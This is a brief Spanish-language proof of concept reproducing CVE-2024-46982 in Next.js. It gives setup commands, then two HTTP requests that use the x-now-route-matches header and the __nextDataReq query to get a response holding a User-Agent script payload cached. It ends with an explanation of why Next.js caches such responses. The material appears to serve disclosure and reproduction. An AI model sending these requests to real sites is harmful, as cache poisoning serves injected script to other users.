
Reproducción de CVE-2024-46982
npm installnpm run buildnpm run startGET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1
2. Visita http://localhost:3000 (Solicitud normal) utilizando cualquier navegador web.


GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1
2. Visita http://localhost:3000 (Solicitud normal) utilizando cualquier navegador web.

x-now-route-matches es un encabezado HTTP personalizado reconocido por Next.js. Cuando está presente, Next.js tratará la solicitud HTTP como "SSG" (Static Site Generation), por lo que la respuesta HTTP puede ser almacenada en caché (Cache-Control: s-maxage=1, stale-while-revalidate).
?__nextDataReq=1 es una cadena de consulta reconocida por Next.js. Cuando está presente, Next.js tratará la solicitud HTTP como "Recuperando __NEXT_DATA__".
El informe completo se puede encontrar en la sección Créditos